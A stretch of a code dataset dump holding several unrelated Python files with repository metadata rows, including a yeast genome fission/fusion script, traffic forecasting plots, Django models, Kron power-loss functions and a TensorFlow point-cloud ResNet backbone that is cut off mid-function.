ancestor_copy_number = 1
fissions,fusions = calculateFissionAndFussions(descendant_file,ancestor_file,
descendant_copy_number,ancestor_copy_number,
ancestor_block_sequence_dir)
outfile.write('preWGD yeast -> L. kluyveri\n' +
'fissions: '+ str(fissions)+'\t' + 'fusions: '+str(fusions)+'\n')
"""
preWGD yeast -> L. waltii
"""
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
descendant_file = species_block_sequence_dir + 'Lwaltii.final.block'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
descendant_copy_number = 1
ancestor_copy_number = 1
fissions,fusions = calculateFissionAndFussions(descendant_file,ancestor_file,
descendant_copy_number,ancestor_copy_number,
ancestor_block_sequence_dir)
outfile.write('preWGD yeast -> L. waltii\n' +
'fissions: '+ str(fissions)+'\t' + 'fusions: '+str(fusions)+'\n')
"""
preWGD yeast -> L. thermotolerans
"""
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
descendant_file = species_block_sequence_dir + 'Lthermotolerans.final.block'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
descendant_copy_number = 1
ancestor_copy_number = 1
fissions,fusions = calculateFissionAndFussions(descendant_file,ancestor_file,
descendant_copy_number,ancestor_copy_number,
ancestor_block_sequence_dir)
outfile.write('preWGD yeast -> L. thermotolerans\n' +
'fissions: '+ str(fissions)+'\t' + 'fusions: '+str(fusions)+'\n')
"""
preWGD yeast -> E. gossypii
"""
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
descendant_file = species_block_sequence_dir + 'Egossypii.final.block'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
descendant_copy_number = 1
ancestor_copy_number = 1
fissions,fusions = calculateFissionAndFussions(descendant_file,ancestor_file,
descendant_copy_number,ancestor_copy_number,
ancestor_block_sequence_dir)
outfile.write('preWGD yeast -> E. gossypii\n' +
'fissions: '+ str(fissions)+'\t' + 'fusions: '+str(fusions)+'\n')
"""
preWGD yeast -> K. lactis
"""
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
descendant_file = species_block_sequence_dir + 'Klactis.final.block'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
descendant_copy_number = 1
ancestor_copy_number = 1
fissions,fusions = calculateFissionAndFussions(descendant_file,ancestor_file,
descendant_copy_number,ancestor_copy_number,
ancestor_block_sequence_dir)
outfile.write('preWGD yeast -> K. lactis\n' +
'fissions: '+ str(fissions)+'\t' + 'fusions: '+str(fusions)+'\n')
outfile.close() | 38.84153 | 91 | 0.684159 | 775 | 7,108 | 5.925161 | 0.091613 | 0.127395 | 0.156794 | 0.141115 | 0.892639 | 0.892639 | 0.885671 | 0.885671 | 0.885671 | 0.877178 | 0 | 0.009986 | 0.21103 | 7,108 | 183 | 92 | 38.84153 | 0.808845 | 0 | 0 | 0.778846 | 0 | 0 | 0.22679 | 0.123187 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009615 | 0 | 0.009615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6c5a17fb3fc251164bb7917de42f131fc5956ebe | 13,326 | py | Python | visualisation.py | PatriceC/MLProjectISDP2020 | 64e83824690ccde2714d915c70fb00b20aa66a42 | [
"MIT"
] | 1 | 2021-01-23T01:04:00.000Z | 2021-01-23T01:04:00.000Z | visualisation.py | cor3ntino/Time-Series-Prediction-with-Deep-Learning-for-Road-Trafic-Data | e8eefdf2e630a53e09f88550357b67732f2bccd0 | [
"MIT"
] | null | null | null | visualisation.py | cor3ntino/Time-Series-Prediction-with-Deep-Learning-for-Road-Trafic-Data | e8eefdf2e630a53e09f88550357b67732f2bccd0 | [
"MIT"
] | 1 | 2021-01-19T16:57:27.000Z | 2021-01-19T16:57:27.000Z | # -*- coding: utf-8 -*-
"""
Created on Thu Dec 9 23:30:00 2020
@author: Patrice CHANOL & Corentin MORVAN--CHAUMEIL
"""
import pandas as pd
import numpy as np
import torch
import matplotlib.pyplot as plt
import data_preprocessing
def pred_vs_reality(model, input_window, output_window, date_range=['2018-07-09', '2018-08-10'], latitude=30.268652000000003, longitude=-97.759929, direction=0, epoch=None, pourcentage=None):
"""
Affiche les prédictions du modèle choisi pour la date, lieu et direction choisis.
Parameters
----------
model : Modèle choisi
input_window : int
Représente le nombre de jours de la séquence d'entrée qui servira d'input pour l'entraînement
output_window : int
Représente le nombre d'heures de la séquence de sortie qui servira de target
date_range : list, optional
DESCRIPTION. The default is ['2018-07-09', '2018-08-10']
latitude : float, optional
DESCRIPTION. The default is 30.268652000000003
longitude : float, optional
DESCRIPTION. The default is -97.759929
direction : int, optional
DESCRIPTION. The default is 0
epoch : int
Nombre d'epoch dans l'apprentissage du modèle
pourcentage : int
Pourcentage de l'epoch d'apprentissage
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
data = pd.read_csv('./Radar_Traffic_Counts.csv')
# Préparation du Dataset
data = data.drop(columns=['location_name', 'Time Bin'])
data['Direction'] = data['Direction'].astype('category').cat.codes
data['Date'] = pd.to_datetime(data[['Year', 'Month', 'Day']], errors='coerce')
data = data.sort_values(['Date'])
data_tot = data
# Le dataprocessing se passe de manière très analogue à data_preprocessing.py mais on ne peut pas le reprendre car il y a tout de même quelques différences
# On ne garde que les données qui nous intéressent; c'est à dire celle de la range de date, lieu et direction
data = data[(data['Date'] >= date_range[0]) & (data['Date'] <= date_range[1]) & (data['location_longitude'] == longitude) & (data['location_latitude'] == latitude) & (data['Direction'] == direction)]
col = ['location_latitude', 'location_longitude', 'Year', 'Month', 'Day', 'Date', 'Day of Week', 'Hour', 'Direction']
col_no_hour = ['location_latitude', 'location_longitude', 'Year', 'Month', 'Day', 'Date', 'Day of Week', 'Direction']
data = data.groupby(col)['Volume'].sum().reset_index()
data_tot = data_tot.groupby(col)['Volume'].sum().reset_index() # On garde les données totales car on aura besoin d'avoir accès aux jours avant les jours auxquels on souhaite faire des prédictions
# On va normaliser (méthode min-max) les valeurs
volume_max, volume_min = data['Volume'].max(), data['Volume'].min()
data = data.pivot_table(index=col_no_hour, columns='Hour', values='Volume').reset_index()
data_tot = data_tot.pivot_table(index=col_no_hour, columns='Hour', values='Volume').reset_index()
# De même, on supprime les lignes avec des valeurs manquantes
data = data.dropna()
data_tot = data_tot.dropna()
# Ce sont les listes qui contiendront les dates et heures (x), volumes réels (t) et volume prédits (p)
x, t, p = [], [], []
# Tous les intervalles de temps output_window, on va réaliser des prédictions seq-to-seq sur les output_window heures suivantes, et enregistrer ces prédictions pour les comparer, visuellement, aux valeurs réelles
current_date = pd.to_datetime(date_range[0])
while current_date < pd.to_datetime(date_range[1]):
date_row = current_date.replace(hour=0)
# On enregistre l'heure actuelle
hour_current = current_date.hour
# On regarde sur quelle ligne on se trouve
row = data[(data['Date'] == date_row)]
day_of_week = row['Day of Week']
# On va créer nos séries de données pour le jour désiré et l'output_window
result = data_preprocessing.series(date=date_row, latitude=latitude, longitude=longitude, direction=direction, input_window=input_window, output_window=output_window, data=data_tot)
if result is not None:
target, serie = result
# On récupère les séries de valeurs à partir de l'heure qui nous intéresse, c'est-à-dire hour_current, puis on normalise pour inférer sur le modèle
target_norm, serie_norm = torch.tensor((target[hour_current] - volume_min)/(volume_max - volume_min)), torch.tensor((serie[hour_current] - volume_min)/(volume_max - volume_min)).unsqueeze(0)
# On transforme notre jour de la semaine en matrice de one-hot vectors (toutes les lignes sont donc les mêmes)
day_of_week_one_hot = torch.tensor(np.eye(7)[day_of_week])
# On infère pour obtenir nos prédictions
pred_norm = model.forward(day_of_week_one_hot.to(device), serie_norm.float().to(device)).detach().squeeze(0)
# On dénormalise
target_current = (target_norm * (volume_max - volume_min) + volume_min).tolist()
pred_current = (pred_norm * (volume_max - volume_min) + volume_min).tolist()
x += [current_date + pd.to_timedelta(h, unit='h') for h in range(output_window)]
t += target_current
p += pred_current
# On incrémente la date de l'intervalle output_window
current_date += pd.to_timedelta(output_window, unit='h')
# On visualise les prédictions vs la réalité et on enregistre le graphe
res = pd.DataFrame()
res['x'] = x
res['t'] = t
res['p'] = p
res.index = res['x']
plt.figure(0)
res['t'].plot(color="green", label='Donnée réelle')
res['p'].plot(color="red", label='Prediction')
plt.axis([x[0], x[-1], 0, max(max(t), max(p))])
plt.legend(loc='upper right')
if epoch is None:
plt.title(model.name_model +': Data vs Pred')
plt.show()
else:
plt.title(model.name_model +': Data vs Pred, Epoch : '+ str(epoch))
plt.show()
plt.savefig('./visu/pred_vs_data_' + model.name_model + '_epoch_' + str(epoch) + '_pourcentage_' + str(pourcentage) + '%_' + str(input_window) + '_days_to_' + str(output_window) + '_hours.png', dpi=300)
plt.close()
def forecast(model, input_window, output_window, date_range=['2018-07-09', '2018-08-10'], latitude=30.268652000000003, longitude=-97.759929, direction=0, epoch=None):
"""
A partir de la date date_range[0], réalise un forecast avec le modèle choisi jusqu'à la date date_range[1].
Pour cela, on ne prend que les données nécessaires pour la première prédiction (prédiction des premières 24h par exemple)
puis utilise les prédictions pour réaliser les prédictions postérieures (pendant plusieurs semaines par exemple)
Les prédictions sont donc biaisées au fur et à mesure; et l'on va tenter de représenter visuellement ici à quel
point le forecast long-terme est proche de la réalité ou non.
Parameters
----------
model : Modèle choisi
input_window : int
Représente le nombre de jours de la séquence d'entrée qui servira d'input pour l'entraînement
output_window : int
Représente le nombre d'heures de la séquence de sortie qui servira de target
date_range : list, optional
DESCRIPTION. The default is ['2018-07-09', '2018-08-10']
latitude : float, optional
DESCRIPTION. The default is 30.268652000000003
longitude : float, optional
DESCRIPTION. The default is -97.759929
direction : int, optional
DESCRIPTION. The default is 0
epoch : int
Nombre d'epoch dans l'apprentissage du modèle
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
data = pd.read_csv('./Radar_Traffic_Counts.csv')
# Préparation du Dataset
data = data.drop(columns=['location_name', 'Time Bin'])
data['Direction'] = data['Direction'].astype('category').cat.codes
data['Date'] = pd.to_datetime(data[['Year', 'Month', 'Day']], errors='coerce')
data = data.sort_values(['Date'])
data_tot = data
# Le dataprocessing se passe de manière très analogue à data_preprocessing.py mais on ne peut pas le reprendre car il y a tout de même quelques différences
# On ne garde que les données qui nous intéressent; c'est à dire celle de la range de date, lieu et direction
data = data[(data['Date'] >= date_range[0]) & (data['Date'] <= date_range[1]) & (data['location_longitude'] == longitude) & (data['location_latitude'] == latitude) & (data['Direction'] == direction)]
col = ['location_latitude', 'location_longitude', 'Year', 'Month', 'Day', 'Date', 'Day of Week', 'Hour', 'Direction']
col_no_hour = ['location_latitude', 'location_longitude', 'Year', 'Month', 'Day', 'Date', 'Day of Week', 'Direction']
data = data.groupby(col)['Volume'].sum().reset_index()
data_tot = data_tot.groupby(col)['Volume'].sum().reset_index() # On garde les données totales car on aura besoin d'avoir accès aux jours avant les jours auxquels on souhaite faire des prédictions
# On va normaliser (méthode min-max) les valeurs
volume_max, volume_min = data['Volume'].max(), data['Volume'].min()
data = data.pivot_table(index=col_no_hour, columns='Hour', values='Volume').reset_index()
data_tot = data_tot.pivot_table(index=col_no_hour, columns='Hour', values='Volume').reset_index()
# De même, on supprime les lignes avec des valeurs manquantes
data = data.dropna()
data_tot = data_tot.dropna()
# Ce sont les listes qui contiendront les dates et heures (x), volumes réels (t) et volume prédits (p)
x, t, p = [], [], []
current_date = pd.to_datetime(date_range[0])
inputs_for_prediction, output_of_prediction = None, None
while current_date < pd.to_datetime(date_range[1]):
date_row = current_date.replace(hour=0)
# On enregistre l'heure actuelle
hour_current = current_date.hour
# On regarde sur quelle ligne on se trouve
row = data[(data['Date'] == date_row)]
day_of_week = row['Day of Week']
# On va créer nos séries de données pour le jour désiré et l'output_window
result = data_preprocessing.series(date=date_row, latitude=latitude, longitude=longitude, direction=direction, input_window=input_window, output_window=output_window, data=data_tot)
if result is not None:
# On ne servira des données de "serie" qu'au premier passage; après nous aurons des données d'entrées correspondant au décalage que nous avons effectué en prenant en input les valeurs prédites précédemment
target, serie = result
# Au premier passage
if inputs_for_prediction is None:
target, serie = target[hour_current], serie[hour_current]
inputs_for_prediction = serie
# Ensuite, on modifie la série d'inputs pour ajouter petit à petit les prédictions faites dans les itérations précédentes
else:
target = target[hour_current]
inputs_for_prediction = np.array(list(inputs_for_prediction[output_window:]) + output_of_prediction)
# On récupère les séries de valeurs à partir de l'heure qui nous intéresse, c'est-à-dire hour_current, puis on normalise pour inférer sur le modèle
target_norm, input_norm = torch.tensor((target - volume_min)/(volume_max - volume_min)), torch.tensor((inputs_for_prediction - volume_min)/(volume_max - volume_min)).unsqueeze(0)
# On transforme notre jour de la semaine en matrice de one-hot vectors (toutes les lignes sont donc les mêmes)
day_of_week_one_hot = torch.tensor(np.eye(7)[day_of_week])
# On infère pour obtenir nos prédictions
pred_norm = model.forward(day_of_week_one_hot.to(device), input_norm.float().to(device)).detach().squeeze(0)
# On dénormalise
target_current = (target_norm * (volume_max - volume_min) + volume_min).tolist()
pred_current = (pred_norm * (volume_max - volume_min) + volume_min).tolist()
# Liste de prédictions qui seront nécessaires en input pour la prochaine prédiction du forecast
output_of_prediction = pred_current
x += [current_date + pd.to_timedelta(h, unit='h') for h in range(output_window)]
t += target_current
p += pred_current
# On incrémente la date de l'intervalle output_window
current_date += pd.to_timedelta(output_window, unit='h')
# On visualise les prédictions vs la réalité et on enregistre le graphe
res = pd.DataFrame()
res['x'] = x
res['t'] = t
res['p'] = p
res.index = res['x']
plt.figure(1)
res['t'].plot(color="green", label='Donnée réelle')
res['p'].plot(color="red", label='Prediction')
plt.axis([x[0], x[-1], 0, max(max(t), max(p))])
plt.legend(loc='upper right')
if epoch is None:
plt.title(model.name_model +': Forecast')
plt.show()
else:
plt.title(model.name_model +': Forecast, Epoch :'+ str(epoch))
plt.show()
plt.savefig('./visu/forecast_' + model.name_model + '_epoch_' + str(epoch) + '_' + str(input_window) + '_days_to_' + str(output_window) + '_hours.png', dpi=300)
plt.close()
| 52.258824 | 217 | 0.675371 | 1,893 | 13,326 | 4.611727 | 0.18859 | 0.028866 | 0.014433 | 0.020619 | 0.809622 | 0.802749 | 0.794731 | 0.794731 | 0.758305 | 0.758305 | 0 | 0.020311 | 0.209365 | 13,326 | 254 | 218 | 52.464567 | 0.808276 | 0.380084 | 0 | 0.788618 | 0 | 0 | 0.129205 | 0.006479 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01626 | false | 0 | 0.04065 | 0 | 0.056911 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
669994f84d8b01d577238e804af1931357a7839c | 91 | py | Python | simplebitly/__init__.py | amirRamirfatahi/simplebitly | edd2fc869d1b5696fd76f6255a341145019c52ad | [
"MIT"
] | null | null | null | simplebitly/__init__.py | amirRamirfatahi/simplebitly | edd2fc869d1b5696fd76f6255a341145019c52ad | [
"MIT"
] | 2 | 2020-01-13T13:09:06.000Z | 2020-01-13T13:10:40.000Z | simplebitly/__init__.py | amirRamirfatahi/simple_bitly | edd2fc869d1b5696fd76f6255a341145019c52ad | [
"MIT"
] | null | null | null | from .shortener import app as generator_app
from .redirector import app as redirector_app
| 22.75 | 45 | 0.835165 | 14 | 91 | 5.285714 | 0.5 | 0.243243 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 91 | 3 | 46 | 30.333333 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
66b438e06b1ece696d8af65917cab018dc2e5281 | 541 | py | Python | predict/models.py | lightd22/swainBot-web | 80c3a3052d8227f15b6345ef198e06528fc3fa14 | [
"Apache-2.0"
] | 1 | 2017-10-20T05:06:26.000Z | 2017-10-20T05:06:26.000Z | predict/models.py | lightd22/swainBot-web | 80c3a3052d8227f15b6345ef198e06528fc3fa14 | [
"Apache-2.0"
] | 5 | 2017-10-20T05:44:18.000Z | 2020-09-25T21:13:36.000Z | predict/models.py | lightd22/swainBot-web | 80c3a3052d8227f15b6345ef198e06528fc3fa14 | [
"Apache-2.0"
] | 1 | 2018-01-14T15:56:16.000Z | 2018-01-14T15:56:16.000Z | from django.db import models
# Create your models here.
class Champion(models.Model):
champ_id = models.IntegerField(name='id', primary_key=True)
display_name = models.TextField(name='display_name', max_length=200)
image = None
def __str__(self):
return self.display_name
class Position(models.Model):
position_id = models.IntegerField(name='id', primary_key=True)
display_name = models.TextField(name='display_name', max_length=200)
image = None
def __str__(self):
return self.display_name
| 31.823529 | 72 | 0.722736 | 73 | 541 | 5.082192 | 0.410959 | 0.177898 | 0.107817 | 0.12938 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0 | 0.013393 | 0.171904 | 541 | 16 | 73 | 33.8125 | 0.814732 | 0.044362 | 0 | 0.615385 | 0 | 0 | 0.054369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0.153846 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
66c8498c80aa0679d0feea5e2cdd4d18efffa6b3 | 1,196 | py | Python | mypower/losses_kron.py | yasirroni/mypower | 123c2d3380bf5f753a479c35e7b5cbafc82a8ebc | [
"Apache-2.0"
] | 2 | 2020-08-08T15:13:49.000Z | 2021-01-04T07:21:29.000Z | mypower/losses_kron.py | yasirroni/mypower | 123c2d3380bf5f753a479c35e7b5cbafc82a8ebc | [
"Apache-2.0"
] | null | null | null | mypower/losses_kron.py | yasirroni/mypower | 123c2d3380bf5f753a479c35e7b5cbafc82a8ebc | [
"Apache-2.0"
] | 1 | 2020-08-08T15:14:17.000Z | 2020-08-08T15:14:17.000Z | import numpy as np
def losses_kron(B0_kron,B1_kron,B2_kron,gen_PG_point,baseMVA):
"""Compute losses based on Kron's Method."""
gen_PG_point_pu = np.array(gen_PG_point) / baseMVA #convert to p.u.
B0_kron = np.array(B0_kron)
B1_kron = np.array(B1_kron)
B2_kron = np.array(B2_kron)
# losses0 = B0_kron * baseMVA
# losses1 = B1_kron.dot(gen_PG_point_pu) * baseMVA
# losses2 = gen_PG_point_pu.T.dot(B2_kron).dot(gen_PG_point_pu) * baseMVA
# losses = losses2 + losses1 + losses0 #total power losses
return (B0_kron + B1_kron.dot(gen_PG_point_pu) + gen_PG_point_pu.T.dot(B2_kron).dot(gen_PG_point_pu)) * baseMVA
def losses_kron_detailed(B0_kron,B1_kron,B2_kron,gen_PG_point,baseMVA):
"""Compute losses based on Kron's Method."""
gen_PG_point_pu = np.array(gen_PG_point) / baseMVA #convert to p.u.
B0_kron = np.array(B0_kron)
B1_kron = np.array(B1_kron)
B2_kron = np.array(B2_kron)
losses0 = B0_kron * baseMVA
losses1 = B1_kron.dot(gen_PG_point_pu) * baseMVA
losses2 = gen_PG_point_pu.T.dot(B2_kron).dot(gen_PG_point_pu) * baseMVA
# losses = losses2 + losses1 + losses0 #total power losses
return losses0, losses1, losses2 | 47.84 | 115 | 0.720736 | 207 | 1,196 | 3.821256 | 0.164251 | 0.094817 | 0.189633 | 0.166877 | 0.903919 | 0.903919 | 0.903919 | 0.87737 | 0.87737 | 0.87737 | 0 | 0.042254 | 0.168896 | 1,196 | 25 | 116 | 47.84 | 0.753521 | 0.308528 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
66c9a0b894b0f732591ff9784bdb651d5c8df75c | 67 | py | Python | src/AstarTrellis/__init__.py | SebastianMacaluso/AstarTrellis | 29808f18627cb48980de96dd1f1a3455bdd47cd4 | [
"MIT"
] | 1 | 2021-11-27T09:42:07.000Z | 2021-11-27T09:42:07.000Z | src/AstarTrellis/__init__.py | SebastianMacaluso/AstarTrellis | 29808f18627cb48980de96dd1f1a3455bdd47cd4 | [
"MIT"
] | null | null | null | src/AstarTrellis/__init__.py | SebastianMacaluso/AstarTrellis | 29808f18627cb48980de96dd1f1a3455bdd47cd4 | [
"MIT"
] | null | null | null | from . import iter_trellis_exact
from . import iter_trellis_approx
| 22.333333 | 33 | 0.850746 | 10 | 67 | 5.3 | 0.6 | 0.377358 | 0.528302 | 0.792453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119403 | 67 | 2 | 34 | 33.5 | 0.898305 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
dd8fc30ce9da5425c0275aac6da40839375ebd85 | 515 | py | Python | drivers/plot_stsnr_vs_gyroage.py | lgbouma/gilly | b3bc7cf53c28eee6420cd85c3975062d4f46c611 | [
"MIT"
] | null | null | null | drivers/plot_stsnr_vs_gyroage.py | lgbouma/gilly | b3bc7cf53c28eee6420cd85c3975062d4f46c611 | [
"MIT"
] | null | null | null | drivers/plot_stsnr_vs_gyroage.py | lgbouma/gilly | b3bc7cf53c28eee6420cd85c3975062d4f46c611 | [
"MIT"
] | null | null | null | from gilly.plotting import plot_stsnr_vs_gyroage
plot_stsnr_vs_gyroage(Prot_source='VSINI', gyro_source='A19', cdpp_id='rms3')
plot_stsnr_vs_gyroage(Prot_source='VSINI', gyro_source='A19', cdpp_id='rms6')
plot_stsnr_vs_gyroage(Prot_source='VSINI', gyro_source='A19', cdpp_id='rms12')
plot_stsnr_vs_gyroage(Prot_source='M15', gyro_source='A19', cdpp_id='rms3')
plot_stsnr_vs_gyroage(Prot_source='M15', gyro_source='A19', cdpp_id='rms6')
plot_stsnr_vs_gyroage(Prot_source='M15', gyro_source='A19', cdpp_id='rms12')
| 51.5 | 78 | 0.8 | 86 | 515 | 4.337209 | 0.22093 | 0.168901 | 0.206434 | 0.337802 | 0.89008 | 0.89008 | 0.863271 | 0.863271 | 0.863271 | 0.863271 | 0 | 0.052953 | 0.046602 | 515 | 9 | 79 | 57.222222 | 0.706721 | 0 | 0 | 0 | 0 | 0 | 0.132039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
06bc9ea141f0f8bdd807e2a7cb90bc18b25ec2a3 | 17,845 | py | Python | tensorflow/models/backbone/resnet.py | paulwong16/CloserLook3D | 71a7f519e55354c96c579adc7322a26fe7779ce7 | [
"MIT"
] | 215 | 2020-07-03T01:39:57.000Z | 2022-03-21T09:05:55.000Z | tensorflow/models/backbone/resnet.py | eglrp/CloserLook3D | f640be8e7ec9fb99a563034616b7ef413f5bf58e | [
"MIT"
] | 35 | 2020-07-15T04:12:26.000Z | 2022-01-15T13:38:36.000Z | tensorflow/models/backbone/resnet.py | eglrp/CloserLook3D | f640be8e7ec9fb99a563034616b7ef413f5bf58e | [
"MIT"
] | 39 | 2020-07-05T13:53:00.000Z | 2022-03-14T01:53:50.000Z | import tensorflow as tf
import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
ROOT_DIR = os.path.join(BASE_DIR, '..')
sys.path.append(ROOT_DIR)
from ..local_aggregation_operators import *
def simple_block(layer_ind,
config,
inputs,
features,
scope,
radius,
out_fdim,
is_training,
init='xavier',
weight_decay=0,
activation_fn='relu',
bn=True,
bn_momentum=0.98,
bn_eps=1e-3):
"""This Block performing a simple Local Aggregation Operation
Args:
layer_ind: which layer to perform local aggregation
config: config file
inputs: a dict contains all inputs
features: float32[n0_points, in_fdim] - input features
scope: tensorflow scope name
radius: ball query radius
out_fdim: output feature dim
is_training: True indicates training phase
init: weight initialization method
weight_decay: If > 0, add L2Loss weight decay multiplied by this float.
activation_fn: Activation function
bn: If True, add batch norm after convolution
Returns:
float32[n_points, out_fdim]
"""
with tf.variable_scope(scope) as sc:
x = LocalAggregation(config,
query_points=inputs['points'][layer_ind],
support_points=inputs['points'][layer_ind],
neighbors_indices=inputs['neighbors'][layer_ind],
features=features,
scope='local_aggreagtion',
radius=radius,
out_fdim=out_fdim,
is_training=is_training,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
return x
def bottleneck(layer_ind,
config,
inputs,
features,
scope,
radius,
out_fdim,
bottleneck_ratio,
is_training,
init='xavier',
weight_decay=0,
activation_fn='relu',
bn=True,
bn_momentum=0.98,
bn_eps=1e-3):
"""This Block performing a resnet bottleneck convolution (1conv > Local Aggregation > 1conv + shortcut)
Args:
layer_ind: which layer to perform local aggregation
config: config file
inputs: a dict contains all inputs
features: float32[n_points, in_fdim] - input features
scope: tensorflow scope name
radius: ball query radius
out_fdim: output feature dim
bottleneck_ratio: bottleneck_ratio
is_training: True indicates training phase
init: weight initialization method
weight_decay: If > 0, add L2Loss weight decay multiplied by this float.
activation_fn: Activation function
bn: If True, add batch norm after convolution
Returns:
float32[n_points, out_fdim]
"""
with tf.variable_scope(scope) as sc:
with tf.variable_scope('conv1'):
x = conv1d_1x1(features,
out_fdim // bottleneck_ratio,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('conv2'):
x = LocalAggregation(config,
query_points=inputs['points'][layer_ind],
support_points=inputs['points'][layer_ind],
neighbors_indices=inputs['neighbors'][layer_ind],
features=x,
scope='local_aggregation',
radius=radius,
out_fdim=out_fdim // bottleneck_ratio,
is_training=is_training,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('conv3'):
x = conv1d_1x1(x,
out_fdim,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=None,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('shortcut'):
if int(features.shape[1]) != out_fdim:
shortcut = conv1d_1x1(features,
out_fdim,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=None,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
else:
shortcut = features
if activation_fn == 'relu':
output = tf.nn.relu(x + shortcut)
elif activation_fn == 'leaky_relu':
output = tf.nn.leaky_relu(x + shortcut, alpha=0.2)
else:
output = x + shortcut
return output
def strided_bottleneck(layer_ind,
config,
inputs,
features,
scope,
radius,
out_fdim,
bottleneck_ratio,
is_training,
init='xavier',
weight_decay=0,
activation_fn='relu',
bn=True,
bn_momentum=0.98,
bn_eps=1e-3):
"""This Block performing a strided resnet bottleneck convolution (shortcut is a maxpooling)
Args:
layer_ind: layer of support points, and layer+1 is of query points
config: config file
inputs: a dict contains all inputs
features: float32[n0_points, in_fdim] - input features
scope: tensorflow scope name
radius: ball query radius
out_fdim: output feature dim
bottleneck_ratio: bottleneck_ratio
is_training: True indicates training phase
init: weight initialization method
weight_decay: If > 0, add L2Loss weight decay multiplied by this float.
activation_fn: Activation function
bn: If True, add batch norm after convolution
Returns:
float32[n_points, in_fdim]
"""
if out_fdim is None:
out_fdim = features.shape[1]
with tf.variable_scope(scope) as sc:
with tf.variable_scope('conv1'):
x = conv1d_1x1(features,
